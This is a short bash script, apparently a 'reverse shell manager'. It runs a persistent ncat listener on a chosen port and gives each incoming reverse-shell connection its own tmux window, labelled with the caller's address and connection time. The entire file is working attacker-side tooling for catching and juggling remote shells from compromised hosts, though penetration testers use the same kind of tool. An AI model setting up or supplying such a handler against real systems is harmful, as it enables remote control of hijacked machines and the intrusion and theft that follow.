#!/bin/bash

[[ $1 ]] || {
    echo Error: Please specify the port to listen on.
    exit
}

tmux has -t rshman 2>/dev/null && tmux kill-session -t rshman
rm -f .SOCK:*

tmux new -s rshman "
echo Starting reverse shell manager...
ncat -c '
    src=\$NCAT_REMOTE_ADDR:\$NCAT_REMOTE_PORT
    name=.SOCK:\$src:\$(date +%Y%m%d%H%M%S)
    tmux new-window -t rshman -n \$src \"
        echo \$(date)
        echo From: \$src
        echo _______________________________
        sleep 1
        ncat -U \$name
    \"
    ncat -lU \$name
    rm -f \$name
    ' -vlk $1 || {
    echo Window will be closed after 5 seconds.
    sleep 5
}
"
